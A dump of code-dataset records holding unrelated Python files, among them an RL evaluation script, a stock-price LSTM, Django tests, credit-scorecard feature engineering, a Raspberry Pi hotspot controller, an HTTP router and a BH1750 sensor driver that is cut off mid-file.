\"MountainToyCarContinuous-v1\":\n print(\"env_name: MountainToyCarContinuous-v1\")\n if abs(reward) > 0.0:\n done = True\n else:\n done = False\n\n dones.append(done)\n episode_returns.append(episode_rewards)\n print(\"episode: \", e, \" length: \", len(states), \" returns: \", episode_rewards, \" result: \", abs(reward), \" done: \", done)\n\n if args.save_result:\n if args.use_latent and args.task_transition:\n task_mus, task_sigmas, tasks = np.array(task_mus), np.array(task_sigmas), np.array(tasks)\n task_mus, task_sigmas, tasks = np.squeeze(task_mus, axis=1), np.squeeze(task_sigmas, axis=1), np.squeeze(tasks, axis=1)\n\n assert len(tasks) == len(task_mus), 'len(states) != len(actions)'\n assert len(tasks) == len(task_sigmas), 'len(states) != len(rewards)'\n assert len(tasks) == len(rewards), 'len(tasks) != len(rewards)'\n\n states = np.squeeze(np.array(states), axis=1)\n actions = np.squeeze(np.array(actions), axis=1)\n rewards = np.squeeze(np.array(rewards), axis=1)\n\n if args.use_latent and args.task_transition:\n task_data = np.hstack([states, actions, rewards, task_mus, task_sigmas, tasks])\n else:\n task_data = np.hstack([states, actions, rewards])\n\n np.savetxt(fname=os.path.join(result_dir, args.env_name.split('-')[0].lower() + \"_\" + str(e) + \".csv\"),\n X=task_data, delimiter=',')\n print(\"save file: \", os.path.join(result_dir, args.env_name.split('-')[0].lower() + \"_\" + str(e) + \".csv\"))\n\n\ndones = np.array(dones)\nsuccess_rate = np.sum(dones) / dones.shape[0]\nprint(\"=========================================================\")\nprint(\"env_name: \", args.env_name)\nprint(\"load_model: \", load_dir)\nprint(\"mean and variance of episode_returns: \", np.mean(episode_returns), np.std(episode_returns))\nprint(\"success_rate: \", success_rate)\nprint(\"=========================================================\")\n","sub_path":"enjoy.py","file_name":"enjoy.py","file_ext":"py","file_size_in_byte":11118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"258707903","text":"from .drivers import get_driver\nimport json, os\n\nclass CorpusReader:\n def __init__(self, addr, driver, parse_dir='./.parse/'):\n self.data = []\n self.addr = addr\n self.parse_dir = parse_dir\n self.driver = get_driver(driver)\n\n if not os.path.exists(self.parse_dir):\n os.mkdir(self.parse_dir)\n\n def get_dir(self):\n addr = self.addr.replace('/','-')\n return f'{self.parse_dir}{self.driver.__name__.lower()}-{addr}'\n \n def get_data(self):\n self.read(self.addr)\n\n tosave = ['id', 'title', 'author']\n self.simple = list(map(lambda item: {x:item[x] for x in tosave}, self.data))\n with open(self.get_dir(), 'w') as fd:\n json.dump(self.simple, fd)\n return self.data\n\n def get_info(self, rank):\n try:\n with open(self.get_dir(), 'r') as fd:\n self.simple = json.load(fd)\n except FileNotFoundError:\n self.get_data()\n details = []\n for (_, id) in rank:\n info = self.simple[id - 1]\n details.append((info['title'], info['author']))\n return details\n\n def read(self, addr):\n self.data.extend(self.driver.read(addr))\n","sub_path":"src/corpustools/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"545092294","text":"# from tensorflow.examples.tutorials.mnist import input_data;\n# mnist = input_data.read_data_sets(\"MNIST_data/\",one_hot=True);\nimport copy;\nimport tensorflow as tf;\nimport sys;\nsys.path.append('../..');\nfrom feature_extraction.index_feature_extraction import *;\nimport numpy as np;\n\ndef feature_collect(code,ktype, start, end):\n\tresult=[];\n\tcdata=ts.get_k_data(code=code,ktype=ktype,start=start,end=end);\n\tresult=list(cdata['close'].values);\n\treturn result;\n\ndef data_pre(code,ktype, start, end, datalen=50):\n\tdata=[];\n\tlabel=[];\n\ttemplabel=[];\n\txdataorigin=feature_collect(code,ktype,start, end);\n\tlabelorigin=[0];\n\tfor i in range(1,len(xdataorigin)):\n\t\tlabelorigin.append(100.0*(xdataorigin[i]-xdataorigin[i-1])/xdataorigin[i-1]);\n\txglen=len(xdataorigin);\n\tfor i in range(datalen,xglen):\n\t\ttemp=[];\n\t\ttemp=copy.deepcopy(xdataorigin[i-datalen:i]);\n\t\tdata.append(temp);\n\t\ttemplabel.append(labelorigin[i-datalen]);\n\n\tfor i in range(0,len(templabel)):\n\t\ttemp=[0]*13;\n\t\tif templabel[i]>3:\n\t\t\ttemplabel[i]=3;\n\t\telif templabel[i]<-3:\n\t\t\ttemplabel[i]=-3;\n\t\tpos=int((templabel[i]+3)/0.5);\n\t\ttemp[pos]=1;\n\t\tlabel.append(temp);\n\treturn data,label;\n\n\nlearning_rate =0.001;\nbatch_size =200;\ndisplay_step =100;\n\nn_input =500;\nn_steps =1;\nn_hidden =20;\nn_classes =13;\n\ndata,labels=data_pre('hs300','d','2005-04-02','2017-05-30',n_input);\ndata=np.array(data);\nlabels=np.array(labels);\n\nprint(data.shape);\ndatalen=len(data);\ntraining_iters=int(datalen*0.8);\n\nx= tf.placeholder(\"float32\",[None, n_steps,n_input]);\ny= tf.placeholder(\"float32\",[None,n_classes]);\n\nweights={'hidden':tf.Variable(tf.random_normal([n_input,n_hidden])),\n\t\t'out':tf.Variable(tf.random_normal([n_hidden, n_classes]))\n}\n\nbiases={\n\t'hidden': tf.Variable(tf.random_normal([n_hidden])),\n\t'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\nlstm_cell = tf.contrib.rnn.BasicLSTMCell(n_hidden, forget_bias=0.0, state_is_tuple=True);\n_state =lstm_cell.zero_state(batch_size,tf.float32);\n\na1 = tf.transpose(x, [1, 0, 2])\na2 = tf.reshape(a1, [-1, n_input]) \na3 = tf.matmul(a2, weights['hidden']) + biases['hidden'] \na4 = tf.split(a3, n_steps, 0)\n\noutputs,states =tf.contrib.rnn.static_rnn(lstm_cell, a4 ,initial_state=_state);\na5=tf.matmul(outputs[-1], weights['out'])+biases['out'];\n\ncost =tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=a5));\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(cost);\n\ncorrect_pred = tf.equal(tf.argmax(a5,1),tf.argmax(y,1));\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32));\ninit = tf.initialize_all_variables();\n\nsess=tf.InteractiveSession();\nsess.run(init);\nstep =0;\nwhile (step+1) *batch_size ']\n )\n\n def test_future_question(self):\n \"\"\"\n Question with a pub_date in the future, aren't displayed on the index page.\n :return:\n \"\"\"\n create_question(question_text='Future question.', days=30)\n response = self.client.get(reverse('polls:index'))\n self.assertContains(response, 'No polls are available.')\n\n def test_future_question_and_past_question(self):\n \"\"\"\n Even if both past and futrue questions are exist, only past questions are displayed.\n :return:\n \"\"\"\n create_question(question_text='Past question.', days=-30)\n create_question(question_text='Future question', days=30)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(\n response.context['latest_question_list'],\n ['']\n )\n\n def test_two_past_question(self):\n \"\"\"\n The questions page may display multple questions.\n :return:\n \"\"\"\n create_question(question_text='Past question1', days=-30)\n create_question(question_text='Past question2', days=-5)\n response = self.client.get(reverse('polls:index'))\n self.assertQuerysetEqual(\n response.context['latest_question_list'],\n ['', '']\n )\n\n\n# --------\nclass QuestionDetailViewTests(TestCase):\n def test_future_question(self):\n \"\"\"\n The detail of a question with a pub_date in he future returns a 404 not found.\n :return:\n \"\"\"\n future_question = create_question(question_text='Future question.', days=5)\n url = reverse(\"polls:detail\", args=(future_question.id,))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 404)\n\n def test_past_question(self):\n \"\"\"\n The detail view of a question with a pub_date in the past displays the\n question's text.\n :return:\n \"\"\"\n past_question = create_question(question_text='Past question.', days=-5)\n url = reverse('polls:detail', args=(past_question.id,))\n response = self.client.get(url)\n self.assertContains(response, past_question.question_text)","sub_path":"weiwc/polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"415620631","text":"import time\nimport unittest\n\nfrom app.provider import AppServiceProvider\nfrom core import annotation_base, LoggerFactory, Env, ApplicationState\nfrom core.common import Common\nfrom domain.integrator import DomainIntegrator\n\n\ndef unit(**kwargs):\n return annotation_base(None, **kwargs)\n\n\ndef integration(**kwargs):\n return annotation_base(None, **kwargs)\n\n\nlogger = LoggerFactory.get_instance(\"UnitTest\")\n\n\nclass BaseTest(unittest.TestCase):\n def setUp(self):\n app_state = ApplicationState(env=Env.TEST, version=\"xxx\")\n self.common = Common(app_state=app_state)\n self.common.start()\n self.integrator = DomainIntegrator(common=self.common, app_state=app_state)\n domains = self.integrator.get_domains()\n self.app_provider = AppServiceProvider(common=self.common, app_state=app_state,\n domains=domains)\n\n def sleep(self, sec):\n time.sleep(sec)\n","sub_path":"test/unit/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"333361791","text":"\n\nfrom xai.brain.wordbase.nouns._triangle import _TRIANGLE\n\n#calss header\nclass _TRIANGLES(_TRIANGLE, ):\n\tdef __init__(self,): \n\t\t_TRIANGLE.__init__(self)\n\t\tself.name = \"TRIANGLES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"triangle\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_triangles.py","file_name":"_triangles.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"227859583","text":"import pandas as pd\nimport datetime\nimport collections\nimport numpy as np\nimport numbers\nimport random\nimport sys\nimport pickle\nfrom itertools import combinations\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nimport statsmodels.api as sm\nfrom importlib import reload\nfrom matplotlib import pyplot as plt\nreload(sys)\nsys.setdefaultencoding( \"utf-8\")\nfrom scorecard_functions import *\nfrom sklearn.linear_model import LogisticRegressionCV\n# -*- coding: utf-8 -*-\n\n################################\n######## UDF: 自定义函数 ########\n################################\n### 对时间窗口,计算累计产比 ###\ndef TimeWindowSelection(df, daysCol, time_windows):\n '''\n :param df: the dataset containg variabel of days\n :param daysCol: the column of days\n :param time_windows: the list of time window\n :return:\n '''\n freq_tw = {}\n for tw in time_windows:\n freq = sum(df[daysCol].apply(lambda x: int(x<=tw)))\n freq_tw[tw] = freq\n return freq_tw\n\n\ndef DeivdedByZero(nominator, denominator):\n '''\n 当分母为0时,返回0;否则返回正常值\n '''\n if denominator == 0:\n return 0\n else:\n return nominator*1.0/denominator\n\n\n#对某些统一的字段进行统一\ndef ChangeContent(x):\n y = x.upper()\n if y == '_MOBILEPHONE':\n y = '_PHONE'\n return y\n\n\n\ndef MissingCategorial(df,x):\n missing_vals = df[x].map(lambda x: int(x!=x))\n return sum(missing_vals)*1.0/df.shape[0]\n\ndef MissingContinuous(df,x):\n missing_vals = df[x].map(lambda x: int(np.isnan(x)))\n return sum(missing_vals) * 1.0 / df.shape[0]\n\ndef MakeupRandom(x, sampledList):\n if x==x:\n return x\n else:\n randIndex = random.randint(0, len(sampledList)-1)\n return sampledList[randIndex]\n\n\n\n############################################################\n#Step 0: 数据分析的初始工作, 包括读取数据文件、检查用户Id的一致性等#\n############################################################\nfolderOfData = '/Users/Code/Data Collections/bank default/'\ndata1 = pd.read_csv(folderOfData+'PPD_LogInfo_3_1_Training_Set.csv', header = 0)\ndata2 = pd.read_csv(folderOfData+'PPD_Training_Master_GBK_3_1_Training_Set.csv', header = 0,encoding = 'gbk')\ndata3 = pd.read_csv(folderOfData+'PPD_Userupdate_Info_3_1_Training_Set.csv', header = 0)\n\n#############################################################################################\n# Step 1: 从PPD_LogInfo_3_1_Training_Set & PPD_Userupdate_Info_3_1_Training_Set数据中衍生特征#\n#############################################################################################\n# compare whether the four city variables match\ndata2['city_match'] = data2.apply(lambda x: int(x.UserInfo_2 == x.UserInfo_4 == x.UserInfo_8 == x.UserInfo_20),axis = 1)\ndel data2['UserInfo_2']\ndel data2['UserInfo_4']\ndel data2['UserInfo_8']\ndel data2['UserInfo_20']\n\n### 提取申请日期,计算日期差,查看日期差的分布\ndata1['logInfo'] = data1['LogInfo3'].map(lambda x: datetime.datetime.strptime(x,'%Y-%m-%d'))\ndata1['Listinginfo'] = data1['Listinginfo1'].map(lambda x: datetime.datetime.strptime(x,'%Y-%m-%d'))\ndata1['ListingGap'] = data1[['logInfo','Listinginfo']].apply(lambda x: (x[1]-x[0]).days,axis = 1)\nplt.hist(data1['ListingGap'],bins=200)\nplt.title('Days between login date and listing date')\nListingGap2 = data1['ListingGap'].map(lambda x: min(x,365))\nplt.hist(ListingGap2,bins=200)\n\ntimeWindows = TimeWindowSelection(data1, 'ListingGap', range(30,361,30))\n\n'''\n使用180天作为最大的时间窗口计算新特征\n所有可以使用的时间窗口可以有7 days, 30 days, 60 days, 90 days, 120 days, 150 days and 180 days.\n在每个时间窗口内,计算总的登录次数,不同的登录方式,以及每种登录方式的平均次数\n'''\ntime_window = [7, 30, 60, 90, 120, 150, 180]\nvar_list = ['LogInfo1','LogInfo2']\ndata1GroupbyIdx = pd.DataFrame({'Idx':data1['Idx'].drop_duplicates()})\n\nfor tw in time_window:\n data1['TruncatedLogInfo'] = data1['Listinginfo'].map(lambda x: x + datetime.timedelta(-tw))\n temp = data1.loc[data1['logInfo'] >= data1['TruncatedLogInfo']]\n for var in var_list:\n #count the frequences of LogInfo1 and LogInfo2\n count_stats = temp.groupby(['Idx'])[var].count().to_dict()\n data1GroupbyIdx[str(var)+'_'+str(tw)+'_count'] = data1GroupbyIdx['Idx'].map(lambda x: count_stats.get(x,0))\n\n # count the distinct value of LogInfo1 and LogInfo2\n Idx_UserupdateInfo1 = temp[['Idx', var]].drop_duplicates()\n uniq_stats = Idx_UserupdateInfo1.groupby(['Idx'])[var].count().to_dict()\n data1GroupbyIdx[str(var) + '_' + str(tw) + '_unique'] = data1GroupbyIdx['Idx'].map(lambda x: uniq_stats.get(x,0))\n\n # calculate the average count of each value in LogInfo1 and LogInfo2\n data1GroupbyIdx[str(var) + '_' + str(tw) + '_avg_count'] = data1GroupbyIdx[[str(var)+'_'+str(tw)+'_count',str(var) + '_' + str(tw) + '_unique']].\\\n apply(lambda x: DeivdedByZero(x[0],x[1]), axis=1)\n\n\ndata3['ListingInfo'] = data3['ListingInfo1'].map(lambda x: datetime.datetime.strptime(x,'%Y/%m/%d'))\ndata3['UserupdateInfo'] = data3['UserupdateInfo2'].map(lambda x: datetime.datetime.strptime(x,'%Y/%m/%d'))\ndata3['ListingGap'] = data3[['UserupdateInfo','ListingInfo']].apply(lambda x: (x[1]-x[0]).days,axis = 1)\ncollections.Counter(data3['ListingGap'])\nhist_ListingGap = np.histogram(data3['ListingGap'])\nhist_ListingGap = pd.DataFrame({'Freq':hist_ListingGap[0],'gap':hist_ListingGap[1][1:]})\nhist_ListingGap['CumFreq'] = hist_ListingGap['Freq'].cumsum()\nhist_ListingGap['CumPercent'] = hist_ListingGap['CumFreq'].map(lambda x: x*1.0/hist_ListingGap.iloc[-1]['CumFreq'])\n\n'''\n对 QQ和qQ, Idnumber和idNumber,MOBILEPHONE和PHONE 进行统一\n在时间切片内,计算\n (1) 更新的频率\n (2) 每种更新对象的种类个数\n (3) 对重要信息如IDNUMBER,HASBUYCAR, MARRIAGESTATUSID, PHONE的更新\n'''\ndata3['UserupdateInfo1'] = data3['UserupdateInfo1'].map(ChangeContent)\ndata3GroupbyIdx = pd.DataFrame({'Idx':data3['Idx'].drop_duplicates()})\n\ntime_window = [7, 30, 60, 90, 120, 150, 180]\nfor tw in time_window:\n data3['TruncatedLogInfo'] = data3['ListingInfo'].map(lambda x: x + datetime.timedelta(-tw))\n temp = data3.loc[data3['UserupdateInfo'] >= data3['TruncatedLogInfo']]\n\n #frequency of updating\n freq_stats = temp.groupby(['Idx'])['UserupdateInfo1'].count().to_dict()\n data3GroupbyIdx['UserupdateInfo_'+str(tw)+'_freq'] = data3GroupbyIdx['Idx'].map(lambda x: freq_stats.get(x,0))\n\n # number of updated types\n Idx_UserupdateInfo1 = temp[['Idx','UserupdateInfo1']].drop_duplicates()\n uniq_stats = Idx_UserupdateInfo1.groupby(['Idx'])['UserupdateInfo1'].count().to_dict()\n data3GroupbyIdx['UserupdateInfo_' + str(tw) + '_unique'] = data3GroupbyIdx['Idx'].map(lambda x: uniq_stats.get(x, x))\n\n #average count of each type\n data3GroupbyIdx['UserupdateInfo_' + str(tw) + '_avg_count'] = data3GroupbyIdx[['UserupdateInfo_'+str(tw)+'_freq', 'UserupdateInfo_' + str(tw) + '_unique']]. \\\n apply(lambda x: x[0] * 1.0 / x[1], axis=1)\n\n #whether the applicant changed items like IDNUMBER,HASBUYCAR, MARRIAGESTATUSID, PHONE\n Idx_UserupdateInfo1['UserupdateInfo1'] = Idx_UserupdateInfo1['UserupdateInfo1'].map(lambda x: [x])\n Idx_UserupdateInfo1_V2 = Idx_UserupdateInfo1.groupby(['Idx'])['UserupdateInfo1'].sum()\n for item in ['_IDNUMBER','_HASBUYCAR','_MARRIAGESTATUSID','_PHONE']:\n item_dict = Idx_UserupdateInfo1_V2.map(lambda x: int(item in x)).to_dict()\n data3GroupbyIdx['UserupdateInfo_' + str(tw) + str(item)] = data3GroupbyIdx['Idx'].map(lambda x: item_dict.get(x, x))\n\n# Combine the above features with raw features in PPD_Training_Master_GBK_3_1_Training_Set\nallData = pd.concat([data2.set_index('Idx'), data3GroupbyIdx.set_index('Idx'), data1GroupbyIdx.set_index('Idx')],axis= 1)\nallData.to_csv(folderOfData+'allData_0.csv',encoding = 'gbk')\n\n\n\n\n#######################################\n# Step 2: 对类别型变量和数值型变量进行补缺#\n######################################\nallData = pd.read_csv(folderOfData+'allData_0.csv',header = 0,encoding = 'gbk')\nallFeatures = list(allData.columns)\nallFeatures.remove('target')\nif 'Idx' in allFeatures:\n allFeatures.remove('Idx')\nallFeatures.remove('ListingInfo')\n\n#检查是否有常数型变量,并且检查是类别型还是数值型变量\nnumerical_var = []\nfor col in allFeatures:\n if len(set(allData[col])) == 1:\n print('delete {} from the dataset because it is a constant'.format(col))\n del allData[col]\n allFeatures.remove(col)\n else:\n #uniq_vals = list(set(allData[col]))\n #if np.nan in uniq_vals:\n #uniq_vals.remove(np.nan)\n uniq_valid_vals = [i for i in allData[col] if i == i]\n uniq_valid_vals = list(set(uniq_valid_vals))\n if len(uniq_valid_vals) >= 10 and isinstance(uniq_valid_vals[0], numbers.Real):\n numerical_var.append(col)\n\ncategorical_var = [i for i in allFeatures if i not in numerical_var]\n\n#检查变量的最多值的占比情况,以及每个变量中占比最大的值\nrecords_count = allData.shape[0]\ncol_most_values,col_large_value = {},{}\nfor col in allFeatures:\n value_count = allData[col].groupby(allData[col]).count()\n col_most_values[col] = max(value_count)/records_count\n large_value = value_count[value_count== max(value_count)].index[0]\n col_large_value[col] = large_value\ncol_most_values_df = pd.DataFrame.from_dict(col_most_values, orient = 'index')\ncol_most_values_df.columns = ['max percent']\ncol_most_values_df = col_most_values_df.sort_values(by = 'max percent', ascending = False)\npcnt = list(col_most_values_df[:500]['max percent'])\nvars = list(col_most_values_df[:500].index)\nplt.bar(range(len(pcnt)), height = pcnt)\nplt.title('Largest Percentage of Single Value in Each Variable')\n\n#计算多数值产比超过90%的字段中,少数值的坏样本率是否会显著高于多数值\nlarge_percent_cols = list(col_most_values_df[col_most_values_df['max percent']>=0.9].index)\nbad_rate_diff = {}\nfor col in large_percent_cols:\n large_value = col_large_value[col]\n temp = allData[[col,'target']]\n temp[col] = temp.apply(lambda x: int(x[col]==large_value),axis=1)\n bad_rate = temp.groupby(col).mean()\n if bad_rate.iloc[0]['target'] == 0:\n bad_rate_diff[col] = 0\n continue\n bad_rate_diff[col] = np.log(bad_rate.iloc[0]['target']/bad_rate.iloc[1]['target'])\nbad_rate_diff_sorted = sorted(bad_rate_diff.items(),key=lambda x: x[1], reverse=True)\nbad_rate_diff_sorted_values = [x[1] for x in bad_rate_diff_sorted]\nplt.bar(x = range(len(bad_rate_diff_sorted_values)), height = bad_rate_diff_sorted_values)\n\n#由于所有的少数值的坏样本率并没有显著高于多数值,意味着这些变量可以直接剔除\nfor col in large_percent_cols:\n if col in numerical_var:\n numerical_var.remove(col)\n else:\n categorical_var.remove(col)\n del allData[col]\n\n'''\n对类别型变量,如果缺失超过80%, 就删除,否则当成特殊的状态\n'''\nmissing_pcnt_threshould_1 = 0.8\nfor col in categorical_var:\n missingRate = MissingCategorial(allData,col)\n print('{0} has missing rate as {1}'.format(col,missingRate))\n if missingRate > missing_pcnt_threshould_1:\n categorical_var.remove(col)\n del allData[col]\n if 0 < missingRate < missing_pcnt_threshould_1:\n # In this way we convert NaN to NAN, which is a string instead of np.nan\n allData[col] = allData[col].map(lambda x: str(x).upper())\n\nallData_bk = allData.copy()\n'''\n检查数值型变量\n'''\nmissing_pcnt_threshould_2 = 0.8\ndeleted_var = []\nfor col in numerical_var:\n missingRate = MissingContinuous(allData, col)\n print('{0} has missing rate as {1}'.format(col, missingRate))\n if missingRate > missing_pcnt_threshould_2:\n deleted_var.append(col)\n print('we delete variable {} because of its high missing rate'.format(col))\n else:\n if missingRate > 0:\n not_missing = allData.loc[allData[col] == allData[col]][col]\n #makeuped = allData[col].map(lambda x: MakeupRandom(x, list(not_missing)))\n missing_position = allData.loc[allData[col] != allData[col]][col].index\n not_missing_sample = random.sample(list(not_missing), len(missing_position))\n allData.loc[missing_position,col] = not_missing_sample\n #del allData[col]\n #allData[col] = makeuped\n missingRate2 = MissingContinuous(allData, col)\n print('missing rate after making up is:{}'.format(str(missingRate2)))\n\nif deleted_var != []:\n for col in deleted_var:\n numerical_var.remove(col)\n del allData[col]\n\n\nallData.to_csv(folderOfData+'allData_1.csv', header=True,encoding='gbk', columns = allData.columns, index=False)","sub_path":"天善智能-如何搭建金融信贷风控中的机器学习模型/第三章/scorecard model development.py","file_name":"scorecard model development.py","file_ext":"py","file_size_in_byte":12981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"49454947","text":"import sys\nfrom hashlib import sha256\nfrom base64 import b32encode\n\ndef get_oid(s):\n return \"oid1\"+b32encode(sha256(s).digest()[:20]).decode().lower() #+ 160 bits of sha256, base32 encoded, converted to lowercase\n\nif __name__==\"__main__\":\n f = open(sys.argv[1], 'rb')\n s = f.read()\n f.close()\n print (get_oid(s))\n","sub_path":"oid.py","file_name":"oid.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"11112319","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# sort_wyb.py\n#\n\nimport random\n\n\ndef losuj(liczby, ileliczb, maksliczb):\n\n ile = 0 # ilość unikalnych liczb\n\n # for i in range(ileliczb):\n while ile < ileliczb:\n liczba = random.randint(0, maksliczb)\n if liczby.count(liczba) == 0:\n liczby.append(liczba)\n ile += 1\n\n return liczby\n\n\ndef sort_wyb(tab):\n # selection sort\n print(\" ------------- Sortowanie przez wybieranie ---------------\")\n for i in range(len(tab)):\n k = i\n for j in range(i + 1, len(tab)):\n if tab[j] < tab[k]:\n k = j\n tab[i], tab[k] = tab[k], tab[i]\n return tab\n\n\ndef main(args):\n ile = 10\n tab = [ile]\n maksliczb = int(input('Podaj maksymalną liczbe: '))\n print(losuj(tab, ile, maksliczb))\n print(sort_wyb(tab))\n return 0\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","sub_path":"python/sort_wyb.py","file_name":"sort_wyb.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"482046606","text":"#!/usr/bin/env python3\n\nimport time\nimport serial\n#import urllib.request\nimport json\nimport PyCmdMessenger\nimport csv\n#import requests\nimport glob\nimport subprocess\nimport sys\nimport random\nimport smtplib\nimport logging\nimport logging.handlers\nimport shutil\nimport os.path\nimport threading\nfrom bottle import request, route, run, static_file\n\ncommands = [[\"response_cmd\", \"s*\"],\n [\"ping_cmd\",\"\"],\n [\"log_cmd\",\"\"],\n [\"start_hotsport_cmd\", \"\"],\n [\"hotsport_cmd\", \"\"],\n [\"stop_hotsport_cmd\", \"\"]\n \n ]\n\n\n\n\n\nlogger=logging.getLogger(\"node\")\nlogger.setLevel(logging.INFO)\n#fh=logging.FileHandler(\"/media/usb0/vertigo.log\")\n#fh=logging.handlers.TimedRotatingFileHandler(\"/media/usb0/valerian.log\",when=\"d\",interval=1,backupCount=10) \nfh=logging.handlers.TimedRotatingFileHandler(\"node.log\",when=\"d\",interval=1,backupCount=10) \nfh.setLevel(logging.INFO)\nch= logging.StreamHandler()\nch.setLevel(logging.INFO)\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\n\n\n@route('/')\ndef index():\n return static_file(\"index.html\",root=\"./\")\n\n\n@route('/save_restart')\ndef save_restart():\n stop_hotspot() \n return static_file(\"index.html\",root=\"./\")\n\n\ndef start_hotspot():\n logger.info(\"Start hotspot\")\n\n shutil.copyfile(\"../config/boot/hotspot.txt.example\",\"/boot/hotspot.txt\")\n\n subprocess.call([\"reboot\"])\n\n\ndef stop_hotspot():\n \n logger.info(\"Stop hotspot\")\n \n client.send(commands[5][0])\n try:\n os.remove(\"/boot/hotspot.txt\")\n except OSError:\n pass\n\n subprocess.call([\"reboot\"])\n\n\n\n\nif __name__==\"__main__\":\n\n logger.info(\"Start.\")\n\n threading.Thread(target=run, kwargs=dict(host='0.0.0.0', port=9000)).start()\n\n arduino = PyCmdMessenger.ArduinoBoard(\"/dev/ttyAMA0\",baud_rate=9600)\n global client\n client = PyCmdMessenger.CmdMessenger(arduino, commands,field_separator=\"|\")\n\n\n while True:\t\n response = client.receive()\n logger.info(response)\n\n if os.path.isfile(\"/boot/hotspot.txt\"):\n client.send(commands[4][0])\n \n\n if response is None:\n continue\n\n print (response[0])\n if response[0]==commands[3][0] and not os.path.isfile(\"/boot/hotspot.txt\"):\n start_hotspot()\n\n\n \n\n \n","sub_path":"linux/src/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"633366166","text":"#--------------------------------------------------------------------------------\n# Copyright (c) 2013, MediaSift Ltd\n# All rights reserved.\n# Distribution of this software is strictly forbidden under the terms of this\n# license.\n#\n# Author: Claude Gibert\n#\n#--------------------------------------------------------------------------------\n\"\"\"\nA router to which we pass a list of callables, an http verb and a \"path\".\nPaths can be added dynamically, for example:\nrouter.registerAction('/store/definition',action)\nIn this approach, arguments are supposed to be urlencoded or sent\nin the body of a POST request.\n\"\"\"\nfrom ..core.basic import make_list\nfrom lib.service import Service\nfrom lib.router import Router\n\n\nclass TreeRouter(Router):\n def registerAction(self, path, action, verbs, **kwargs):\n levels = path.split('/')\n self._server.putChild(levels[0], Service(self, self._server))\n self._actions = self.storeAction(self._actions, action, levels, set(make_list(verbs)), kwargs)\n\n # for the Service \n def findAction(self, levels, verb, request):\n node = self._actions\n for level in levels:\n if level in node:\n node = node[level]\n else:\n return None, None, None\n verbs = node[1]\n kwargs = node[2]\n node = node[0]\n if callable(node):\n if verb in verbs:\n return node, None, kwargs\n return None, None, None\n\n # protected \n def storeAction(self, where, action, levels, verbs, kwargs):\n if len(levels) > 0:\n level = levels[0]\n if level in where:\n entry = where[level]\n else:\n entry = {}\n where[level] = self.storeAction(entry, action, levels[1:], verbs, kwargs)\n else:\n return (action, verbs, kwargs)\n return where\n\n # for the HTTPServer\n\n def rootNode(self):\n return self._server\n","sub_path":"build/lib/platin/httpservices/treerouter.py","file_name":"treerouter.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"339216257","text":"from utime import sleep_us\r\n\r\n\"\"\"\r\n ->See the datasheet\r\n ____|___________________________________|_____\r\n | power_off -> 0x00 |\r\n | power_on -> 0x01 |\r\n | reset -> 0x07 |\r\n | cont_h_res_mode -> 0x10 |\r\n | cont_h_res_mode2 -> 0x11 |\r\n | cont_l_res_mode -> 0x13 |\r\n | onet_h_res_mode -> 0x20 |\r\n | onet_h_res_mode2 -> 0x21 |\r\n | onet_l_res_mode -> 0x23 |\r\n ____|___________________________________|_____\r\n\"\"\"\r\n\r\nBH1750_I2C_ADDRESS_PRIM = 0x23;\r\nBH1750_I2C_ADDRESS_SEC = 0x5C;\r\n\r\nMODE_DICT = {'CHR': 0x10, 'CHR2': 0x11, 'CLR': 0x13, 'OHR': 0x20, 'OHR2': 0x21, 'OLR': 0x23}\r\n\r\nclass BH1750:\r\n def __init__(self, i2c=None, address=None):\r\n if address == None:\r\n self._address = BH1750_I2C_ADDRESS_PRIM\r\n self.scanI2CAddress(i2c)\r\n else:\r\n self._address = address\r\n self._mode = None\r\n self._i2c = i2c\r\n self.power_off()\r\n self.reset()\r\n self.power_on()\r\n\r\n def scanI2CAddress(self, i2c):\r\n \"\"\"scans I2C adresses of the bme280 if finds 2 device then automatically select the primary adress\"\"\"\r\n print('Scan i2c bus...')\r\n devices = i2c.scan()\r\n\r\n if devices:\r\n for d in devices:\r\n print(\"Decimal address: \", d, \" | Hex address: \", hex(d))\r\n if d in [BH1750_I2C_ADDRESS_PRIM, BH1750_I2C_ADDRESS_SEC]:\r\n print(\"Connected decimal address: \", d)\r\n self._address = d\r\n return\r\n else:\r\n raise ValueError(\"I2C object is 